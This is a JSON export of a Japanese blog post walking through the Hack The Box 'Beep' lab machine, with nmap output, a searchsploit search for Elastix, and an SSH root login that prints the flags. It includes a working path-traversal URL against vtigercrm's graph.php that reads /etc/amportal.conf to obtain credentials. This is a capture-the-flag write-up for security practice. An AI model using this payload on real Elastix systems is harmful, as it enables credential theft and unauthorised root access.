{"id":3727,"date":"2020-08-15T16:17:16","date_gmt":"2020-08-15T07:17:16","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3727"},"modified":"2020-08-30T23:34:02","modified_gmt":"2020-08-30T14:34:02","slug":"hack-the-box-beep-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3727","title":{"rendered":"Hack The Box – Beep – Walkthrough"},"content":{"rendered":"

\u3010Hack The Box\u3011Beep Walkthrough<\/a>\u3092\u304b\u306a\u308a\u53c2\u8003\u306b\u653b\u7565\u3002<\/p>\n

80\u756a\u3001443\u756a\u30dd\u30fc\u30c8\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b<\/h3>\n
\r\n# nmap -A -n -F -T5 beep.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-11 14:40 UTC\r\nNmap scan report for beep.htb (10.10.10.7)\r\nHost is up (0.046s latency).\r\nNot shown: 89 filtered ports\r\nPORT      STATE SERVICE    VERSION\r\n22\/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)\r\n| ssh-hostkey:\r\n|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)\r\n|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)\r\n25\/tcp    open  smtp       Postfix smtpd\r\n|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,\r\n80\/tcp    open  http       Apache httpd 2.2.3\r\n|_http-server-header: Apache\/2.2.3 (CentOS)\r\n|_http-title: Did not follow redirect to https:\/\/beep.htb\/\r\n|_https-redirect: ERROR: Script execution failed (use -d to debug)\r\n110\/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4\r\n|_pop3-capabilities: APOP AUTH-RESP-CODE STLS LOGIN-DELAY(0) UIDL EXPIRE(NEVER) USER IMPLEMENTATION(Cyrus POP3 server v2) TOP RESP-CODES PIPELINING\r\n111\/tcp   open  rpcbind    2 (RPC #100000)\r\n143\/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4\r\n|_imap-capabilities: THREAD=ORDEREDSUBJECT Completed BINARY CONDSTORE ACL ATOMIC MULTIAPPEND STARTTLS IDLE URLAUTHA0001 X-NETSCAPE IMAP4 QUOTA RENAME ID SORT LISTEXT LITERAL+ OK NAMESPACE CATENATE ANNOTATEMORE NO IMAP4rev1 THREAD=REFERENCES UIDPLUS CHILDREN UNSELECT LIST-SUBSCRIBED MAILBOX-REFERRALS RIGHTS=kxte SORT=MODSEQ\r\n443\/tcp   open  ssl\/https?\r\n|_ssl-date: 2020-08-11T14:49:31+00:00; +5m27s from scanner time.\r\n993\/tcp   open  ssl\/imap   Cyrus imapd\r\n|_imap-capabilities: CAPABILITY\r\n995\/tcp   open  pop3       Cyrus pop3d\r\n3306\/tcp  open  mysql?\r\n|_mysql-info: ERROR: Script execution failed (use -d to debug)\r\n10000\/tcp open  http       MiniServ 1.570 (Webmin httpd)\r\n|_http-title: Site doesn't have a title (text\/html; Charset=iso-8859-1).\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nOS fingerprint not ideal because: Timing level 5 (Insane) used\r\nNo OS matches for host\r\nNetwork Distance: 2 hops\r\nService Info: Hosts:  beep.localdomain, 127.0.0.1, example.com\r\n\r\nHost script results:\r\n|_clock-skew: 5m26s\r\n\r\nTRACEROUTE (using port 80\/tcp)\r\nHOP RTT     ADDRESS\r\n1   0.13 ms 172.17.0.1\r\n2   3.12 ms 10.10.10.7\r\n\r\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\r\nNmap done: 1 IP address (1 host up) scanned in 364.97 seconds\r\n<\/pre>\n
Elastix\u306e\u8106\u5f31\u6027\u3092\u63a2\u3059<\/h3>\n
\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3068Elastix\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b\u3002
\n\"\"<\/a><\/p>\n
\r\n# searchsploit elastix\r\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\n Exploit Title                                                                                                                                         |  Path\r\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nElastix - 'page' Cross-Site Scripting                                                                                                                  | php\/webapps\/38078.py\r\nElastix - Multiple Cross-Site Scripting Vulnerabilities                                                                                                | php\/webapps\/38544.txt\r\nElastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                                                                                          | php\/webapps\/34942.txt\r\nElastix 2.2.0 - 'graph.php' Local File Inclusion                                                                                                       | php\/webapps\/37637.pl\r\nElastix 2.x - Blind SQL Injection                                                                                                                      | php\/webapps\/36305.txt\r\nElastix < 2.5 - PHP Code Injection                                                                                                                     | php\/webapps\/38091.php\r\nFreePBX 2.10.0 \/ Elastix 2.2.0 - Remote Code Execution                                                                                                 | php\/webapps\/18650.py\r\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nShellcodes: No Results\r\n\r\n# searchsploit -m 37637\r\n  Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion\r\n      URL: https:\/\/www.exploit-db.com\/exploits\/37637\r\n     Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/37637.pl\r\nFile Type: ASCII text, with CRLF line terminators\r\n\r\nCopied to: \/home\/shimizu\/deep\/37637.pl\r\n<\/pre>\n
37637.pl \u3092\u53c2\u8003\u306b\u4ee5\u4e0bURL\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3068\u3001ID\u30fbPW\u3092\u53d6\u5f97\u3067\u304d\u308b\u3002<\/p>\n
\r\nhttps:\/\/beep.htb\/vtigercrm\/graph.php?current_language=..\/..\/..\/..\/..\/..\/..\/..\/\/etc\/amportal.conf%00&module=Accounts&action\r\n<\/pre>\n
\"\"<\/a><\/p>\n
\u53d6\u5f97\u3057\u305fID\u30fbPW\u3067SSH\u30ed\u30b0\u30a4\u30f3\u3057\u3066\u307f\u308b<\/h3>\n
\r\n# ssh root@10.10.10.7\r\nUnable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1\r\n\r\n# echo "Host 10.10.10.7" >> ~\/.ssh\/config\r\n# echo "KexAlgorithms +diffie-hellman-group1-sha1" >> ~\/.ssh\/config\r\n\r\n# ssh root@10.10.10.7\r\nroot@10.10.10.7's password:\r\nLast login: Sat Aug 15 09:57:30 2020 from 10.10.14.7\r\n\r\nWelcome to Elastix\r\n----------------------------------------------------\r\n\r\nTo access your Elastix System, using a separate workstation (PC\/MAC\/Linux)\r\nOpen the Internet Browser using the following URL:\r\nhttp:\/\/10.10.10.7\r\n\r\n[root@beep ~]# cat \/root\/root.txt\r\nd88e006123842106982acce0aaf453f0\r\n[root@beep ~]# cat \/home\/fanis\/user.txt\r\naeff3def0c765c2677b94715cffa73ac\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
\u3010Hack The Box\u3011Beep Walkthrough\u3092\u304b\u306a\u308a\u53c2\u8003\u306b\u653b\u7565\u3002 80\u756a\u3001443\u756a\u30dd\u30fc\u30c8\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b # nmap -A -n -F -T5 beep.htb Starting Nmap 7.80 ( […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3727"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3727"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3727\/revisions"}],"predecessor-version":[{"id":3786,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3727\/revisions\/3786"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3727"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3727"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3727"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}